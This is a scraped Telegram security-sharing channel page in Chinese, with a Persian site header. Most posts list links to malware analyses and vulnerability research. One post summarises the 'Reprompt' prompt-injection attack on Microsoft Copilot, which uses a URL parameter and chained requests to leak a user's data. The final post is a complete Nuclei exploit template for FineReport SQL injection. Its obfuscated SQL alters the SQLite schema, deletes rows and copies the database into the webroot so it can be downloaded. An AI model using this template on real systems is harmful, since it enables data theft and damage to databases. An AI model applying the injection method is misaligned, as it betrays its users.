اکنون در دسترس! پژوهش تلگرام ۲۰۲۵ — مهمترین بینشهای سال 
信息安全渗透攻防漏洞分享
رفتن به کانال در Telegram
946
مشترکین
+324 ساعت
+117 روز
+2630 روز
آرشیو پست ها
946
#网络安全 #知识分享 #安全 #安全研究 #安全分享 #AI #AI安全
1⃣ 使用 CyberChef 解码恶意软件 C2 服务器
https://www.netresec.com/?page=Blog&month=2026-01&post=Decoding-malware-C2-with-CyberChef
2⃣ VoidLink:高级 AI 生成恶意软件时代已来临的证据
https://research.checkpoint.com/2026/voidlink-early-ai-generated-malware-framework
3⃣ SolyxImmortal:Python 恶意软件分析
https://www.cyfirma.com/research/solyximmortal-python-malware-analysis
4⃣ 从扩展到感染:深入分析针对软件开发人员的 Evelyn Stealer 攻击活动
https://www.trendmicro.com/es_es/research/26/a/analysis-of-the-evelyn-stealer-campaign.html
946
#漏洞利用 #安全研究 #安全 #知识分享 #网络安全
1⃣ Reprompt:只需单击一下即可利用 Microsoft Copilot 攻击悄无声息地窃取您的个人数据
// 该攻击利用 q URL 参数、双重请求技术和链式请求方法注入恶意提示、执行重复操作并建立持续的数据泄露链。
links:https://www.varonis.com/blog/reprompt
2⃣ 代理浏览器缺乏隔离性导致旧漏洞重现
// 代理浏览器缺乏适当的隔离性,导致 XSS 和 CSRF 等漏洞,进而造成数据泄露、提示注入和会话劫持,因此需要系统级安全措施和扩展的源策略。
links:https://blog.trailofbits.com/2026/01/13/lack-of-isolation-in-agentic-browsers-resurfaces-old-vulnerabilities/
3⃣ Clang 加固速查表
// 本文回顾了过去十年的 Clang 加固技术,重点介绍了新的编译器标志和硬件辅助保护措施,以抵御 ROP、JOP 和推测性攻击等现代漏洞。
https://blog.quarkslab.com/clang-hardening-cheat-sheet-ten-years-later.html
946
#安全分享 #技术分享 #知识分享 #网络安全 #技术分析 #安全研究 #安全
Cloudflare 的 Web 应用程序防火墙 (WAF) 中存在一个严重的零日漏洞,攻击者可以利用该漏洞绕过安全控制,并通过证书验证路径直接访问受保护的源服务器。
https://fearsoff.org/research/cloudflare-acme
946
#渗透测试 #技术分享 #安全分享
id: FineReport-exportexcel-sqli
info:
name: FineReport-exportexcel-sqli
author: sibei
severity: high
tags: FineReport
http:
- raw:
- |
GET /webroot/ReportServer HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
viewlets: [{'reportlet':'/'}]
op: getSessionID
extractors:
- type: regex
part: body
name: id_upload
internal: true
regex:
- "[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}"
- raw:
- |+
GET /webroot/decision/nx/report/v9/largedataset/export/excel?functionParams=%7b%7d&__parameters__=%7b%7d HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:145.0) Gecko/20100101 Firefox/145.0
sessionID: {{id_upload}}
params: %3Cpd%3E%0A+%3CLargeDatasetExcelExportJS+dsName%3D%221%22%3E%0A%3CParameters%3E%3CParameter%3E%0A%3CAttributes+name%3D%22c%22%2F%3E%3CO+t%3D%22Formula%22%3E%3CAttributes%3E%3C%21%5BCDATA%5Bsql%28%27FRDemo%27%2CCONCATENATE%28%22pr%22%2C%22agm%22%2C%22a+wr%22%2C%22i%22%2C%22t%22%2C%22a%22%2C%22ble%22%2C%22_sch%22%2C%22e%22%2C%22ma%3Do%22%2C%22n%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22dele%22%2C%22t%22%2C%22e+f%22%2C%22r%22%2C%22o%22%2C%22m+sq%22%2C%22li%22%2C%22t%22%2C%22e_sc%22%2C%22he%22%2C%22ma+w%22%2C%22here%22%2C%22+na%22%2C%22m%22%2C%22e%21%22%2C%22%3D%22%2C%22%27s%22%2C%22ql%22%2C%22ite%22%2C%22_s%22%2C%22ta%22%2C%22t%22%2C%221%27%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22an%22%2C%22aly%22%2C%22ze%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22re%22%2C%22p%22%2C%22lac%22%2C%22e+i%22%2C%22nto%22%2C%22+s%22%2C%22ql%22%2C%22ite_%22%2C%22st%22%2C%22at%22%2C%221+va%22%2C%22lu%22%2C%22es%28%27%22%2C%22%27%2C%27123%22%2C%22%27%22%2C%22%29%22%29%2C1%29-sql%28%27FRDemo%27%2CCONCATENATE%28%22V%22%2C%22A%22%2C%22C%22%2C%22U%22%2C%22U%22%2C%22M%22%2C%22+i%22%2C%22nt%22%2C%22o%28%27%22%2CENV_HOME%2C%22%2F%22%2C%22.%22%2C%22.%22%2C%22%2F%22%2C%22.%22%2C%22%2F%22%2C%22{{randstr}}%22%2C%22.%22%2C%22t%22%2C%22x%22%2C%22t%22%2C%22%27%29%22%29%2C1%29%5D%5D%3E%3C%2FAttributes%3E%3C%2FO%3E%3C%2FParameter%3E%3C%2FParameters%3E%3C%2FLargeDatasetExcelExportJS%3E%3C%2Fpd%3E
- raw:
- |
GET /webroot/{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
matchers-condition: and
matchers:
- type: word
part: body
words:
- "SQLite format"
- type: status
status:
- 200
